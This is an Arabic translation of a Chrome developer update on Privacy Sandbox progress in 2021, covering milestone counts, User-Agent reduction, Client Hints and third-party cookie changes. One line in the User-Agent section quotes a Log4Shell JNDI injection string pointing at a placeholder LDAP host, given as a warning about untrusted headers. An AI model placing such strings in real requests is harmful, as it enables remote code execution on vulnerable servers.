مستوى التقدُّم في "مبادرة حماية الخصوصية" (كانون الأول/ديسمبر 2021)

مرحبًا بك في ملخّص 2021 من برنامج "Progress" في "مبادرة حماية الخصوصية"، الذي يتتبّع الإنجازات المهمة في مسار الإيقاف التدريجي لملفات تعريف الارتباط التابعة لجهات خارجية في Chrome والعمل على تعزيز الخصوصية على الويب. في العادة، نشارك نظرة عامة على التعديلات التي أُجريت على المخطط الزمني لمبادرة حماية الخصوصية مع أخبار من المشروع، إلا أنّ شهر كانون الأول (ديسمبر) كان هادئًا. بدلاً من ذلك، سنلقي نظرة على بعض الأنشطة التي تمت خلال عام 2021 ونقدم بعض القرارات المحتملة التي يمكنك اتخاذها الآن في العام الجديد.

عملية تطوير Chromium

لإتاحة ميزة جديدة للنظام الأساسي للويب في Chromium، يجب أن تخضع لعملية التطوير المفتوحة للمشروع. في عام 2021، أنتج فريق "مبادرة حماية الخصوصية":

🥚	الرغبة في إنشاء نموذج أولي	19
🧪	ننوي إجراء التجربة	7
🚀	نية الشحن	11

ويشكّل كل حدث مهم أيضًا دعوة للمنظومة المتكاملة للويب الأوسع نطاقًا للمساهمة في هذا الأمر.

الرغبة في إنشاء النموذج الأوّلي هي النقطة المرجعية الأولى التي تدعو فيها إلى المناقشة والتجارب المبكرة. ويعني هذا أنّه سيكون اقتراح متاحًا على GitHub، حيث يمكنك طرح سؤال عن طريق إنشاء مشكلة أو الانضمام إلى المناقشات والعروض التقديمية في مجموعات المعايير، مثل W3C وIETF. وهي أيضًا بداية عملية الترميز، ما يعني أنّه يمكنك توقّع إتاحة وظيفة النموذج الأولي لاختبارها من قِبل المطوِّرين وراء علامة ميزة. الملاحظات الأولية أمر بالغ الأهمية للتحقق من صحة الاقتراحات وتكرارها.

إنّ الرغبة في إجراء التجربة خطوة اختيارية إذا أردنا طلب تجربة مصدر. يمكن للمطوّرين الاشتراك في مرحلة التجربة والتقييم لميزة، ثم اختبارها في مرحلة الإنتاج. يطلق عليها تجربة لأن لدينا جوانب معينة من الميزة التي نريد التحقق من صحتها في بيئات العالم الحقيقي. يقدِّم المطوِّرون الذين يمكنهم اختبار نتائج هذه الاختبارات ومشاركتها ملاحظات قيّمة للمساعدة في تكرار هذه الميزة وتطويرها.

النية إلى الشحن هو المعلم الرئيسي الأخير الذي يشير إلى أنّ الميزة أصبحت الآن مكتملة وجاهزة للتوفّر للجمهور العام. بعد الموافقة، يتم دمج الميزة في إصدار قادم ثم تتقدّم من خلال قنوات إصدار Canary والإصدار التجريبي والثابت. من الضروري التأكّد من اختبار مواقعك الإلكترونية باستخدام إصدارَي Canary والتجريبي من Chrome لرصد أي أخطاء والإبلاغ عنها قبل وصول الميزة إلى القناة الثابتة.

العروض

يكون لكل اقتراح من اقتراحات "مبادرة حماية الخصوصية" مستودع GitHub مصاحب. يستضيف المستودع شرحًا لتلخيص الوظائف العامة، والمواصفات التفصيلية للتنفيذ من خلال المتصفّحات، والمساهمات من المنظومة المتكاملة للويب في شكل "مشاكل" و"طلبات سحب".

قدّمنا في 14 مستودعًا ضمن "مبادرة حماية الخصوصية" ما يلي:

💬	545	المشاكل التي تم إنشاؤها
	250	تم إغلاق المشاكل
🛠️	261	تم إنشاء طلبات السحب
	223	تم دمج طلبات السحب

غالبًا ما تستهدف اللغة المستخدمة في التفسيرات والمواصفات جمهورًا على عِلم بالمعايير وتطوير المتصفّح، والتي قد تكون صعبة إذا لم تكن على دراية بها. ومع ذلك، فإن الهدف من الشرح هو الشرح! إذا كانت هناك نقاط غير واضحة أو لم يتم تناولها، نريد منك الإبلاغ عن مشكلة لنتمكّن من تعديل الشرح وتوضيحه.

درجات الدقة

التنظيف الربيعي لوكيل المستخدم

نظرًا لأننا كنا نعد بداية العام الجديد، نحتسب أيضًا ما يصل إلى كل من الإصدار 100 من Chrome والانخفاض المتزايد لسلسلة وكيل المستخدم. ويُعدّ هذا حافزًا جيدًا لإعادة النظر في أي استخدام لسلسلة وكيل المستخدم في التعليمات البرمجية للتحقق مما إذا كان قد تأثر بأي من هذين التغييرين.

للعثور على هذه المناطق:

1. ابحث عن navigator.userAgent في رمز JavaScript أو يمكنك الوصول إلى عنوان User-Agent في رمز الخادم.
2. راجِع تحليل السلسلة للاطّلاع على افتراضات حول إصدار من رقمَين. على سبيل المثال، يجب استبدال التعبير العادي الذي يحدّد \d\d أو \d{2} بـ \d+.
3. تحقَّق من استخدامك للسلسلة في أي مكان تعتمد فيه على:
   • إصدار النظام الأساسي (نظام التشغيل)
   • نسخة كاملة من إصدار Chrome
   • اسم الجهاز الجوّال
4. هذه هي القيم التي سيتم تقليلها إلى سلاسل ثابتة في المستقبل. إذا كنت بحاجة إلى الوصول إلى هذه القيم، يمكنك النقل إلى تلميحات عميل وكيل المستخدم.

يتوفّر تعديل في شهر كانون الأول (ديسمبر) للإشارة إلى أنّه إذا كنت تستخدم تلميحات برنامج وكيل المستخدم، لقد أرسلنا إليك الرغبة في الشحن من أجل تفعيل تلميحات التفويض إلى مصادر أخرى في HTML عبر علامة <meta>. مثال:

<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">

إذا كنت في حالة مزاجية حماسية للتنظيف في فصل الربيع، يمكنك أيضًا التفكير في بدائل لاستخدام وكيل المستخدم تمامًا. إذا كنت تستخدم السلسلة لاكتشاف الأجهزة المحمولة، فتحقق مما إذا كان يمكنك استبدال هذا بتصميم سريع الاستجابة. إذا كنت تتحقّق من اسم المتصفّح وإصداره لإتاحة الميزة، ننصحك باستخدام ميزة اكتشاف الميزات بدلاً من ذلك.

وتجدر الإشارة إلى أنّه لا يمكن ضمان دقة وكيل المستخدم، مثل أي قيمة يقدّمها العميل، أو حتى تقديمه. وتقدم الثغرة الأمنية Log4j، "Log4shell" مثالاً على هذه الخطر. قد يتمكّن العميل الذي يضبط سلسلة وكيل المستخدم على تضمين قيمة مثل ${jndi:ldap://example.com/file} من الحصول على موقع إلكتروني لتحليلها بشكل فعّال على الخادم.

فهرسة ملفات تعريف الارتباط

هناك نشاط تقليدي آخر في العام الجديد وهو التأكد من أنك سعيد أن لديك عددًا صحيًا من الكعك بمكونات عالية الجودة. بينما نواصل المضي قدمًا في عملية الإيقاف التدريجي لملفات تعريف الارتباط التابعة لجهات خارجية، عليك التأكّد من أنّك تعرف ملفات تعريف الارتباط في موقعك الإلكتروني التي ستتأثر. في عام 2020، أصبح من الضروري وضع علامة SameSite=None على جميع ملفات تعريف الارتباط لاستخدامها على مواقع إلكترونية مختلفة أو تابعة لجهات خارجية.

أي ملف تعريف ارتباط تم ضبط السمة SameSite فيه على None سيحتاج إلى تعديل.

هناك ثلاثة مسارات محتملة يجب أخذها في الاعتبار في الوقت الحالي:

1. إذا كان ملف تعريف الارتباط مطلوبًا فقط في علاقة 1:1 مع الموقع الإلكتروني ذي المستوى الأعلى، اتّبِع الخطوات التي يتم اتّباعها في اقتراح CHIPS. وهذا يعني إضافة السمة Partitioned إلى ملف تعريف الارتباط.
2. في حال استخدام ملف تعريف الارتباط في سياق مواقع إلكترونية متعددة، ولكن فقط على جميع المواقع الإلكترونية التي تملكها وتديرها، قد يكون ملف تعريف الارتباط مرشحًا لاستخدام مجموعات نطاقات الطرف الأول. يتطلّب ذلك تحديد المواقع الإلكترونية في المجموعة وإضافة السمة SameParty إلى ملف تعريف الارتباط.
3. في حال استخدام ملف تعريف الارتباط لتوفير شكل من القيم المشتركة على مستوى مواقع إلكترونية متعددة، راجِع المجموعة الأوسع من اقتراحات "مبادرة حماية الخصوصية" للعثور على حلّ بديل لا يعتمد على التتبُّع على مواقع إلكترونية متعددة.

إذا كنت تشعر بوعي بشكل خاص، هذا هو الوقت المثالي لمراجعة استخداماتك لملفّات تعريف الارتباط، إذ لدينا وصفة جيّدة لتحسين ملفات تعريف الارتباط الخاصة بالطرف الأول أيضًا.

إضافة ملاحظات

في إطار جهودنا المتواصلة لنشر هذه التعديلات الشهرية والتقدم المحرز من خلال "مبادرة حماية الخصوصية" ككل، نريد التأكّد من أنّ المطوّرين يتلقّون المعلومات والدعم الذي يحتاجونه. يُرجى إعلامنا على @ChromiumDev Twitter إذا كان هناك أيّ اقتراحات يمكننا تحسينها في هذه السلسلة. سنستخدم المعلومات التي قدّمتها لمواصلة تحسين التنسيق.

يمكنك الاطّلاع على الأسئلة الشائعة حول "مبادرة حماية الخصوصية"، والتي نواصل توسيعها استنادًا إلى المشاكل التي ترسلها إلى تقرير دعم المطوّرين. إذا كان لديك أي أسئلة حول الاختبار أو التنفيذ في أي من الاقتراحات، يمكنك التحدث إلينا هناك.